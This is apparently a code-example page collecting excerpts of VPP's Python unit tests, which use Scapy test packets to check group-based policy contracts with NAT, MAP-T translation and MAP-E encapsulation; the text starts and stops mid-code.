                # BVI in BD
                self.vapi.sw_interface_set_l2_bridge(epg.bvi.sw_if_index,
                                                     epg.bd,
                                                     bvi=1)
                # BVI L2 FIB entry
                self.vapi.l2fib_add_del(self.router_mac,
                                        epg.bd,
                                        epg.bvi.sw_if_index,
                                        is_add=1,
                                        bvi_mac=1)

            # EPG in VPP
            epg.add_vpp_config()

        for recirc in recircs:
            # EPG's ingress recirculation interface maps to its RD
            recirc.recirc.set_table_ip4(recirc.epg.rd)
            recirc.recirc.set_table_ip6(recirc.epg.rd)

            # in the bridge to allow DVR. L2 emulation to punt to L3
            self.vapi.sw_interface_set_l2_bridge(recirc.recirc.sw_if_index,
                                                 recirc.epg.bd)
            self.vapi.sw_interface_set_l2_emulation(recirc.recirc.sw_if_index)

            self.vapi.nat44_interface_add_del_feature(
                recirc.recirc.sw_if_index, is_inside=0, is_add=1)
            self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
                                              is_inside=0,
                                              is_add=1)

            recirc.add_vpp_config()

        ep_routes = []
        ep_arps = []
        for ep in eps:
            self.pg_enable_capture(self.pg_interfaces)
            self.pg_start()
            #
            # routes to the endpoints. We need these since there are no
            # adj-fibs due to the fact the the BVI address has /32 and
            # the subnet is not attached.
            #
            r = VppIpRoute(
                self,
                ep.ip,
                ep.ip_len,
                [VppRoutePath(ep.ip, ep.epg.bvi.sw_if_index, proto=ep.proto)],
                is_ip6=ep.is_ip6)
            r.add_vpp_config()
            ep_routes.append(r)

            #
            # ARP entries for the endpoints
            #
            a = VppNeighbor(self,
                            ep.epg.bvi.sw_if_index,
                            ep.itf.remote_mac,
                            ep.ip,
                            af=ep.af)
            a.add_vpp_config()
            ep_arps.append(a)

            # add each EP itf to the its BD
            self.vapi.sw_interface_set_l2_bridge(ep.itf.sw_if_index, ep.epg.bd)

            # add the BD ARP termination entry
            self.vapi.bd_ip_mac_add_del(bd_id=ep.epg.bd,
                                        mac=ep.bin_mac,
                                        ip=ep.ip_n,
                                        is_ipv6=0,
                                        is_add=1)

            # L2 FIB entry
            self.vapi.l2fib_add_del(ep.mac,
                                    ep.epg.bd,
                                    ep.itf.sw_if_index,
                                    is_add=1)

            # Add static mappings for each EP from the 10/8 to 11/8 network
            if ep.af == AF_INET:
                self.vapi.nat44_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       addr_only=1)
            else:
                self.vapi.nat66_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0)

            # VPP EP create ...
            ep.add_vpp_config()

            # ... results in a Gratuitous ARP/ND on the EPG's uplink
            rx = ep.epg.uplink.get_capture(1, timeout=0.2)

            if ep.is_ip6:
                self.assertTrue(rx[0].haslayer(ICMPv6ND_NA))
                self.assertEqual(rx[0][ICMPv6ND_NA].tgt, ep.ip)
            else:
                self.assertTrue(rx[0].haslayer(ARP))
                self.assertEqual(rx[0][ARP].psrc, ep.ip)
                self.assertEqual(rx[0][ARP].pdst, ep.ip)

            # add the BD ARP termination entry for floating IP
            self.vapi.bd_ip_mac_add_del(bd_id=epg_nat.bd,
                                        mac=ep.bin_mac,
                                        ip=ep.floating_ip_n,
                                        is_ipv6=ep.is_ip6,
                                        is_add=1)

            # floating IPs route via EPG recirc
            r = VppIpRoute(self,
                           ep.floating_ip,
                           ep.ip_len, [
                               VppRoutePath(ep.floating_ip,
                                            ep.recirc.recirc.sw_if_index,
                                            is_dvr=1,
                                            proto=ep.proto)
                           ],
                           table_id=20,
                           is_ip6=ep.is_ip6)
            r.add_vpp_config()
            ep_routes.append(r)

            # L2 FIB entries in the NAT EPG BD to bridge the packets from
            # the outside direct to the internal EPG
            self.vapi.l2fib_add_del(ep.mac,
                                    epg_nat.bd,
                                    ep.recirc.recirc.sw_if_index,
                                    is_add=1)

        #
        # ARP packets for unknown IP are flooded
        #
        pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                   ARP(op="who-has",
                       hwdst="ff:ff:ff:ff:ff:ff",
                       hwsrc=self.pg0.remote_mac,
                       pdst=epgs[0].bvi_ip4,
                       psrc="10.0.0.88"))

        self.send_and_expect(self.pg0, [pkt_arp], self.pg0)

        #
        # ARP/ND packets get a response
        #
        pkt_arp = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                   ARP(op="who-has",
                       hwdst="ff:ff:ff:ff:ff:ff",
                       hwsrc=self.pg0.remote_mac,
                       pdst=epgs[0].bvi_ip4,
                       psrc=eps[0].ip))

        self.send_and_expect(self.pg0, [pkt_arp], self.pg0)

        nsma = in6_getnsma(inet_pton(AF_INET6, eps[4].ip))
        d = inet_ntop(AF_INET6, nsma)
        pkt_nd = (Ether(dst=in6_getnsmac(nsma)) / IPv6(dst=d, src=eps[4].ip) /
                  ICMPv6ND_NS(tgt=epgs[0].bvi_ip6) /
                  ICMPv6NDOptSrcLLAddr(lladdr=self.pg0.remote_mac))
        self.send_and_expect(self.pg0, [pkt_nd], self.pg0)

        #
        # broadcast packets are flooded
        #
        pkt_bcast = (Ether(dst="ff:ff:ff:ff:ff:ff", src=self.pg0.remote_mac) /
                     IP(src=eps[0].ip, dst="232.1.1.1") /
                     UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.vapi.cli("clear trace")
        self.pg0.add_stream(pkt_bcast)

        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rxd = eps[1].itf.get_capture(1)
        self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)
        rxd = epgs[0].uplink.get_capture(1)
        self.assertEqual(rxd[0][Ether].dst, pkt_bcast[Ether].dst)

        #
        # packets to non-local L3 destinations dropped
        #
        pkt_intra_epg_220_ip4 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_222_ip4 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="10.0.1.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg0, pkt_intra_epg_220_ip4 * 65)

        pkt_inter_epg_222_ip6 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst="2001:10::99") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))
        self.send_and_assert_no_replies(self.pg0, pkt_inter_epg_222_ip6 * 65)

        #
        # Add the subnet routes
        #
        s41 = VppGbpSubnet(self, 0, "10.0.0.0", 24)
        s42 = VppGbpSubnet(self, 0, "10.0.1.0", 24)
        s43 = VppGbpSubnet(self, 0, "10.0.2.0", 24)
        s41.add_vpp_config()
        s42.add_vpp_config()
        s43.add_vpp_config()
        s61 = VppGbpSubnet(self, 0, "2001:10::1", 64, is_ip6=True)
        s62 = VppGbpSubnet(self, 0, "2001:10:1::1", 64, is_ip6=True)
        s63 = VppGbpSubnet(self, 0, "2001:10:2::1", 64, is_ip6=True)
        s61.add_vpp_config()
        s62.add_vpp_config()
        s63.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_intra_epg_220_ip4 * 65,
                                     self.pg4)
        self.send_and_expect_bridged(self.pg3, pkt_inter_epg_222_ip4 * 65,
                                     self.pg6)
        self.send_and_expect_bridged6(self.pg3, pkt_inter_epg_222_ip6 * 65,
                                      self.pg6)

        self.logger.info(self.vapi.cli("sh ip fib 11.0.0.2"))
        self.logger.info(self.vapi.cli("sh gbp endpoint-group"))
        self.logger.info(self.vapi.cli("sh gbp endpoint"))
        self.logger.info(self.vapi.cli("sh gbp recirc"))
        self.logger.info(self.vapi.cli("sh int"))
        self.logger.info(self.vapi.cli("sh int addr"))
        self.logger.info(self.vapi.cli("sh int feat loop6"))
        self.logger.info(self.vapi.cli("sh vlib graph ip4-gbp-src-classify"))
        self.logger.info(self.vapi.cli("sh int feat loop3"))

        #
        # Packet destined to unknown unicast is sent on the epg uplink ...
        #
        pkt_intra_epg_220_to_uplink = (
            Ether(src=self.pg0.remote_mac, dst="00:00:00:33:44:55") /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg0,
                                     pkt_intra_epg_220_to_uplink * 65,
                                     self.pg4)
        # ... and nowhere else
        self.pg1.get_capture(0, timeout=0.1)
        self.pg1.assert_nothing_captured(remark="Flood onto other VMS")

        pkt_intra_epg_221_to_uplink = (
            Ether(src=self.pg2.remote_mac, dst="00:00:00:33:44:66") /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg2,
                                     pkt_intra_epg_221_to_uplink * 65,
                                     self.pg5)

        #
        # Packets from the uplink are forwarded in the absence of a contract
        #
        pkt_intra_epg_220_from_uplink = (
            Ether(src="00:00:00:33:44:55", dst=self.pg0.remote_mac) /
            IP(src=eps[0].ip, dst="10.0.0.99") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg4,
                                     pkt_intra_epg_220_from_uplink * 65,
                                     self.pg0)

        #
        # in the absence of policy, endpoints in the same EPG
        # can communicate
        #
        pkt_intra_epg = (
            Ether(src=self.pg0.remote_mac, dst=self.pg1.remote_mac) /
            IP(src=eps[0].ip, dst=eps[1].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)

        #
        # in the abscense of policy, endpoints in the different EPG
        # cannot communicate
        #
        pkt_inter_epg_220_to_221 = (
            Ether(src=self.pg0.remote_mac, dst=self.pg2.remote_mac) /
            IP(src=eps[0].ip, dst=eps[2].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_221_to_220 = (
            Ether(src=self.pg2.remote_mac, dst=self.pg0.remote_mac) /
            IP(src=eps[2].ip, dst=eps[0].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))
        pkt_inter_epg_220_to_222 = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst=eps[3].ip) / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_221 * 65)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # A uni-directional contract from EPG 220 -> 221
        #
        c1 = VppGbpContract(self, 220, 221, 0)
        c1.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
                                     self.pg2)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # contract for the return direction
        #
        c2 = VppGbpContract(self, 221, 220, 0)
        c2.add_vpp_config()

        self.send_and_expect_bridged(self.pg0, pkt_inter_epg_220_to_221 * 65,
                                     self.pg2)
        self.send_and_expect_bridged(self.pg2, pkt_inter_epg_221_to_220 * 65,
                                     self.pg0)

        #
        # check that inter group is still disabled for the groups
        # not in the contract.
        #
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_222 * 65)

        #
        # A uni-directional contract from EPG 220 -> 222 'L3 routed'
        #
        c3 = VppGbpContract(self, 220, 222, 0)
        c3.add_vpp_config()

        self.logger.info(self.vapi.cli("sh gbp contract"))

        self.send_and_expect_routed(self.pg0, pkt_inter_epg_220_to_222 * 65,
                                    self.pg3, self.router_mac)

        #
        # remove both contracts, traffic stops in both directions
        #
        c2.remove_vpp_config()
        c1.remove_vpp_config()
        c3.remove_vpp_config()

        self.send_and_assert_no_replies(self.pg2,
                                        pkt_inter_epg_221_to_220 * 65)
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_221 * 65)
        self.send_and_expect_bridged(self.pg0, pkt_intra_epg * 65, self.pg1)

        #
        # EPs to the outside world
        #

        # in the EP's RD an external subnet via the NAT EPG's recirc
        se1 = VppGbpSubnet(self,
                           0,
                           "0.0.0.0",
                           0,
                           is_internal=False,
                           sw_if_index=recirc_nat.recirc.sw_if_index,
                           epg=epg_nat.epg)
        se1.add_vpp_config()
        se2 = VppGbpSubnet(self,
                           0,
                           "11.0.0.0",
                           8,
                           is_internal=False,
                           sw_if_index=recirc_nat.recirc.sw_if_index,
                           epg=epg_nat.epg)
        se2.add_vpp_config()
        se16 = VppGbpSubnet(self,
                            0,
                            "::",
                            0,
                            is_internal=False,
                            sw_if_index=recirc_nat.recirc.sw_if_index,
                            epg=epg_nat.epg,
                            is_ip6=True)
        se16.add_vpp_config()
        # in the NAT RD an external subnet via the NAT EPG's uplink
        se3 = VppGbpSubnet(self,
                           20,
                           "0.0.0.0",
                           0,
                           is_internal=False,
                           sw_if_index=epg_nat.uplink.sw_if_index,
                           epg=epg_nat.epg)
        se36 = VppGbpSubnet(self,
                            20,
                            "::",
                            0,
                            is_internal=False,
                            sw_if_index=epg_nat.uplink.sw_if_index,
                            epg=epg_nat.epg,
                            is_ip6=True)
        se4 = VppGbpSubnet(self,
                           20,
                           "11.0.0.0",
                           8,
                           is_internal=False,
                           sw_if_index=epg_nat.uplink.sw_if_index,
                           epg=epg_nat.epg)
        se3.add_vpp_config()
        se36.add_vpp_config()
        se4.add_vpp_config()

        self.logger.info(self.vapi.cli("sh ip fib 0.0.0.0/0"))
        self.logger.info(self.vapi.cli("sh ip fib 11.0.0.1"))
        self.logger.info(self.vapi.cli("sh ip6 fib ::/0"))
        self.logger.info(self.vapi.cli("sh ip6 fib %s" % eps[4].floating_ip))

        #
        # From an EP to an outside addess: IN2OUT
        #
        pkt_inter_epg_220_to_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst="1.1.1.1") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        # no policy yet
        self.send_and_assert_no_replies(self.pg0,
                                        pkt_inter_epg_220_to_global * 65)

        c4 = VppGbpContract(self, 220, 333, 0)
        c4.add_vpp_config()

        self.send_and_expect_natted(self.pg0, pkt_inter_epg_220_to_global * 65,
                                    self.pg7, eps[0].floating_ip)

        pkt_inter_epg_220_to_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst="6001::1") / UDP(sport=1234, dport=1234) /
            Raw('\xa5' * 100))

        self.send_and_expect_natted6(self.pg0,
                                     pkt_inter_epg_220_to_global * 65,
                                     self.pg7, eps[4].floating_ip)

        #
        # From a global address to an EP: OUT2IN
        #
        pkt_inter_epg_220_from_global = (
            Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
            IP(dst=eps[0].floating_ip, src="1.1.1.1") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_assert_no_replies(self.pg7,
                                        pkt_inter_epg_220_from_global * 65)

        c5 = VppGbpContract(self, 333, 220, 0)
        c5.add_vpp_config()

        self.send_and_expect_unnatted(self.pg7,
                                      pkt_inter_epg_220_from_global * 65,
                                      eps[0].itf, eps[0].ip)

        pkt_inter_epg_220_from_global = (
            Ether(src=self.router_mac, dst=self.pg0.remote_mac) /
            IPv6(dst=eps[4].floating_ip, src="6001::1") /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_unnatted6(self.pg7,
                                       pkt_inter_epg_220_from_global * 65,
                                       eps[4].itf, eps[4].ip)

        #
        # From a local VM to another local VM using resp. public addresses:
        #  IN2OUT2IN
        #
        pkt_intra_epg_220_global = (
            Ether(src=self.pg0.remote_mac, dst=self.router_mac) /
            IP(src=eps[0].ip, dst=eps[1].floating_ip) /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_double_natted(eps[0].itf,
                                           pkt_intra_epg_220_global * 65,
                                           eps[1].itf, eps[0].floating_ip,
                                           eps[1].ip)

        pkt_intra_epg_220_global = (
            Ether(src=self.pg4.remote_mac, dst=self.router_mac) /
            IPv6(src=eps[4].ip, dst=eps[5].floating_ip) /
            UDP(sport=1234, dport=1234) / Raw('\xa5' * 100))

        self.send_and_expect_double_natted6(eps[4].itf,
                                            pkt_intra_epg_220_global * 65,
                                            eps[5].itf, eps[4].floating_ip,
                                            eps[5].ip)

        #
        # cleanup
        #
        for ep in eps:
            # del static mappings for each EP from the 10/8 to 11/8 network
            if ep.af == AF_INET:
                self.vapi.nat44_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       addr_only=1,
                                                       is_add=0)
            else:
                self.vapi.nat66_add_del_static_mapping(ep.ip_n,
                                                       ep.floating_ip_n,
                                                       vrf_id=0,
                                                       is_add=0)

        for epg in epgs:
            # IP config on the BVI interfaces
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip4_n,
                                                   32,
                                                   is_add=0)
            self.vapi.sw_interface_add_del_address(epg.bvi.sw_if_index,
                                                   epg.bvi_ip6_n,
                                                   128,
                                                   is_add=0,
                                                   is_ipv6=True)
            self.logger.info(self.vapi.cli("sh int addr"))

            epg.uplink.set_table_ip4(0)
            epg.uplink.set_table_ip6(0)

            if epg != epgs[0] and epg != epgs[3]:
                epg.bvi.set_table_ip4(0)
                epg.bvi.set_table_ip6(0)

                self.vapi.nat44_interface_add_del_feature(epg.bvi.sw_if_index,
                                                          is_inside=1,
                                                          is_add=0)
                self.vapi.nat66_add_del_interface(epg.bvi.sw_if_index,
                                                  is_inside=1,
                                                  is_add=0)

        for recirc in recircs:
            recirc.recirc.set_table_ip4(0)
            recirc.recirc.set_table_ip6(0)

            self.vapi.nat44_interface_add_del_feature(
                recirc.recirc.sw_if_index, is_inside=0, is_add=0)
            self.vapi.nat66_add_del_interface(recirc.recirc.sw_if_index,
                                              is_inside=0,
                                              is_add=0)
コード例 #27
0
    def test_map_t(self):
        """ MAP-T """

        #
        # Add a domain that maps from pg0 to pg1
        #
        map_dst = '2001:db8::/32'
        map_src = '1234:5678:90ab:cdef::/64'
        ip4_pfx = '192.168.0.0/24'
        tag = 'MAP-T Tag.'

        self.vapi.map_add_domain(ip6_prefix=map_dst,
                                 ip4_prefix=ip4_pfx,
                                 ip6_src=map_src,
                                 ea_bits_len=16,
                                 psid_offset=6,
                                 psid_length=4,
                                 mtu=1500,
                                 tag=tag)

        # Enable MAP-T on interfaces.
        self.vapi.map_if_enable_disable(is_enable=1,
                                        sw_if_index=self.pg0.sw_if_index,
                                        is_translation=1)
        self.vapi.map_if_enable_disable(is_enable=1,
                                        sw_if_index=self.pg1.sw_if_index,
                                        is_translation=1)

        # Ensure MAP doesn't steal all packets!
        v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
              IP(src=self.pg0.remote_ip4, dst=self.pg0.remote_ip4) /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
        rx = self.send_and_expect(self.pg0, v4 * 1, self.pg0)
        v4_reply = v4[1]
        v4_reply.ttl -= 1
        for p in rx:
            self.validate(p[1], v4_reply)
        # Ensure MAP doesn't steal all packets
        v6 = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
              IPv6(src=self.pg1.remote_ip6, dst=self.pg1.remote_ip6) /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
        rx = self.send_and_expect(self.pg1, v6 * 1, self.pg1)
        v6_reply = v6[1]
        v6_reply.hlim -= 1
        for p in rx:
            self.validate(p[1], v6_reply)

        map_route = VppIpRoute(self, "2001:db8::", 32, [
            VppRoutePath(self.pg1.remote_ip6,
                         self.pg1.sw_if_index,
                         proto=DpoProto.DPO_PROTO_IP6)
        ])
        map_route.add_vpp_config()

        #
        # Send a v4 packet that will be translated
        #
        p_ether = Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac)
        p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
        payload = TCP(sport=0xabcd, dport=0xabcd)

        p4 = (p_ether / p_ip4 / payload)
        p6_translated = (IPv6(src="1234:5678:90ab:cdef:ac:1001:200:0",
                              dst="2001:db8:1f0::c0a8:1:f") / payload)
        p6_translated.hlim -= 1
        rx = self.send_and_expect(self.pg0, p4 * 1, self.pg1)
        for p in rx:
            self.validate(p[1], p6_translated)

        # Send back an IPv6 packet that will be "untranslated"
        p_ether6 = Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac)
        p_ip6 = IPv6(src='2001:db8:1f0::c0a8:1:f',
                     dst='1234:5678:90ab:cdef:ac:1001:200:0')
        p6 = (p_ether6 / p_ip6 / payload)
        p4_translated = (IP(src='192.168.0.1', dst=self.pg0.remote_ip4) /
                         payload)
        p4_translated.id = 0
        p4_translated.ttl -= 1
        rx = self.send_and_expect(self.pg1, p6 * 1, self.pg0)
        for p in rx:
            self.validate(p[1], p4_translated)

        # IPv4 TTL
        ip4_ttl_expired = IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0)
        p4 = (p_ether / ip4_ttl_expired / payload)

        icmp4_reply = (
            IP(id=0, ttl=254, src=self.pg0.local_ip4, dst=self.pg0.remote_ip4)
            / ICMP(type='time-exceeded', code='ttl-zero-during-transit') /
            IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0) / payload)
        rx = self.send_and_expect(self.pg0, p4 * 1, self.pg0)
        for p in rx:
            self.validate(p[1], icmp4_reply)
        '''
        This one is broken, cause it would require hairpinning...
        # IPv4 TTL TTL1
        ip4_ttl_expired = IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=1)
        p4 = (p_ether / ip4_ttl_expired / payload)

        icmp4_reply = IP(id=0, ttl=254, src=self.pg0.local_ip4,
        dst=self.pg0.remote_ip4) / \
        ICMP(type='time-exceeded', code='ttl-zero-during-transit' ) / \
        IP(src=self.pg0.remote_ip4, dst='192.168.0.1', ttl=0) / payload
        rx = self.send_and_expect(self.pg0, p4*1, self.pg0)
        for p in rx:
            self.validate(p[1], icmp4_reply)
        '''

        # IPv6 Hop limit
        ip6_hlim_expired = IPv6(hlim=0,
                                src='2001:db8:1ab::c0a8:1:ab',
                                dst='1234:5678:90ab:cdef:ac:1001:200:0')
        p6 = (p_ether6 / ip6_hlim_expired / payload)

        icmp6_reply = (IPv6(
            hlim=255, src=self.pg1.local_ip6, dst="2001:db8:1ab::c0a8:1:ab") /
                       ICMPv6TimeExceeded(code=0) /
                       IPv6(src="2001:db8:1ab::c0a8:1:ab",
                            dst='1234:5678:90ab:cdef:ac:1001:200:0',
                            hlim=0) / payload)
        rx = self.send_and_expect(self.pg1, p6 * 1, self.pg1)
        for p in rx:
            self.validate(p[1], icmp6_reply)

        # IPv4 Well-known port
        p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
        payload = UDP(sport=200, dport=200)
        p4 = (p_ether / p_ip4 / payload)
        self.send_and_assert_no_replies(self.pg0, p4 * 1)

        # IPv6 Well-known port
        payload = UDP(sport=200, dport=200)
        p6 = (p_ether6 / p_ip6 / payload)
        self.send_and_assert_no_replies(self.pg1, p6 * 1)

        # Packet fragmentation
        payload = UDP(sport=40000, dport=4000) / self.payload(1453)
        p4 = (p_ether / p_ip4 / payload)
        self.pg_enable_capture()
        self.pg0.add_stream(p4)
        self.pg_start()
        rx = self.pg1.get_capture(2)
        for p in rx:
            pass
            # TODO: Manual validation
            # self.validate(p[1], icmp4_reply)

        # Packet fragmentation send fragments
        payload = UDP(sport=40000, dport=4000) / self.payload(1453)
        p4 = (p_ether / p_ip4 / payload)
        frags = fragment(p4, fragsize=1000)
        self.pg_enable_capture()
        self.pg0.add_stream(frags)
        self.pg_start()
        rx = self.pg1.get_capture(2)
        for p in rx:
            pass
            # p.show2()

        # reass_pkt = reassemble(rx)
        # p4_reply.ttl -= 1
        # p4_reply.id = 256
        # self.validate(reass_pkt, p4_reply)

        # TCP MSS clamping
        self.vapi.map_param_set_tcp(1300)

        #
        # Send a v4 TCP SYN packet that will be translated and MSS clamped
        #
        p_ether = Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac)
        p_ip4 = IP(src=self.pg0.remote_ip4, dst='192.168.0.1')
        payload = TCP(sport=0xabcd,
                      dport=0xabcd,
                      flags="S",
                      options=[('MSS', 1460)])

        p4 = (p_ether / p_ip4 / payload)
        p6_translated = (IPv6(src="1234:5678:90ab:cdef:ac:1001:200:0",
                              dst="2001:db8:1f0::c0a8:1:f") / payload)
        p6_translated.hlim -= 1
        p6_translated[TCP].options = [('MSS', 1300)]
        rx = self.send_and_expect(self.pg0, p4 * 1, self.pg1)
        for p in rx:
            self.validate(p[1], p6_translated)

        # Send back an IPv6 packet that will be "untranslated"
        p_ether6 = Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac)
        p_ip6 = IPv6(src='2001:db8:1f0::c0a8:1:f',
                     dst='1234:5678:90ab:cdef:ac:1001:200:0')
        p6 = (p_ether6 / p_ip6 / payload)
        p4_translated = (IP(src='192.168.0.1', dst=self.pg0.remote_ip4) /
                         payload)
        p4_translated.id = 0
        p4_translated.ttl -= 1
        p4_translated[TCP].options = [('MSS', 1300)]
        rx = self.send_and_expect(self.pg1, p6 * 1, self.pg0)
        for p in rx:
            self.validate(p[1], p4_translated)
コード例 #28
0
    def test_map_e(self):
        """ MAP-E """

        #
        # Add a route to the MAP-BR
        #
        map_br_pfx = "2001::"
        map_br_pfx_len = 32
        map_route = VppIpRoute(
            self, map_br_pfx, map_br_pfx_len,
            [VppRoutePath(self.pg1.remote_ip6, self.pg1.sw_if_index)])
        map_route.add_vpp_config()

        #
        # Add a domain that maps from pg0 to pg1
        #
        map_dst = '2001::/32'
        map_src = '3000::1/128'
        client_pfx = '192.168.0.0/16'
        map_translated_addr = '2001:0:101:7000:0:c0a8:101:7'
        tag = 'MAP-E tag.'
        self.vapi.map_add_domain(ip4_prefix=client_pfx,
                                 ip6_prefix=map_dst,
                                 ip6_src=map_src,
                                 ea_bits_len=20,
                                 psid_offset=4,
                                 psid_length=4,
                                 tag=tag)

        self.vapi.map_param_set_security_check(enable=1, fragments=1)

        # Enable MAP on interface.
        self.vapi.map_if_enable_disable(is_enable=1,
                                        sw_if_index=self.pg0.sw_if_index,
                                        is_translation=0)

        # Ensure MAP doesn't steal all packets!
        v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
              IP(src=self.pg0.remote_ip4, dst=self.pg0.remote_ip4) /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
        rx = self.send_and_expect(self.pg0, v4 * 1, self.pg0)
        v4_reply = v4[1]
        v4_reply.ttl -= 1
        for p in rx:
            self.validate(p[1], v4_reply)

        #
        # Fire in a v4 packet that will be encapped to the BR
        #
        v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
              IP(src=self.pg0.remote_ip4, dst='192.168.1.1') /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))

        self.send_and_assert_encapped_one(v4, "3000::1", map_translated_addr)

        #
        # Verify reordered fragments are able to pass as well
        #
        v4 = (Ether(dst=self.pg0.local_mac, src=self.pg0.remote_mac) /
              IP(id=1, src=self.pg0.remote_ip4, dst='192.168.1.1') /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 1000))

        frags = fragment_rfc791(v4, 400)
        frags.reverse()

        self.send_and_assert_encapped(frags, "3000::1", map_translated_addr)

        # Enable MAP on interface.
        self.vapi.map_if_enable_disable(is_enable=1,
                                        sw_if_index=self.pg1.sw_if_index,
                                        is_translation=0)

        # Ensure MAP doesn't steal all packets
        v6 = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
              IPv6(src=self.pg1.remote_ip6, dst=self.pg1.remote_ip6) /
              UDP(sport=20000, dport=10000) / Raw(b'\xa5' * 100))
        rx = self.send_and_expect(self.pg1, v6 * 1, self.pg1)
        v6_reply = v6[1]
        v6_reply.hlim -= 1
        for p in rx:
            self.validate(p[1], v6_reply)

        #
        # Fire in a V6 encapped packet.
        # expect a decapped packet on the inside ip4 link
        #
        p = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
             IPv6(dst='3000::1', src=map_translated_addr) /
             IP(dst=self.pg0.remote_ip4, src='192.168.1.1') /
             UDP(sport=10000, dport=20000) / Raw(b'\xa5' * 100))

        self.pg1.add_stream(p)

        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg0.get_capture(1)
        rx = rx[0]

        self.assertFalse(rx.haslayer(IPv6))
        self.assertEqual(rx[IP].src, p[IP].src)
        self.assertEqual(rx[IP].dst, p[IP].dst)

        #
        # Verify encapped reordered fragments pass as well
        #
        p = (IP(id=1, dst=self.pg0.remote_ip4, src='192.168.1.1') /
             UDP(sport=10000, dport=20000) / Raw(b'\xa5' * 1500))
        frags = fragment_rfc791(p, 400)
        frags.reverse()

        stream = (Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) /
                  IPv6(dst='3000::1', src=map_translated_addr) / x
                  for x in frags)

        self.pg1.add_stream(stream)

        self.pg_enable_capture(self.pg_interfaces)
        self.pg_start()

        rx = self.pg0.get_capture(len(frags))

        for r in rx:
            self.assertFalse(r.haslayer(IPv6))
            self.assertEqual(r[IP].src, p[IP].src)
            self.assertEqual(r[IP].dst, p[IP].dst)

        # Verify that fragments pass even if ipv6 layer is fragmented
        stream = (IPv6(dst='3000::1', src=map_translated_addr) / x
                  for x in frags)

        v6_stream = [
            Ether(dst=self.pg1.local_mac, src=self.pg1.remote_mac) / x
            for i in range(len(frags)) for x in fragment_rfc8200(
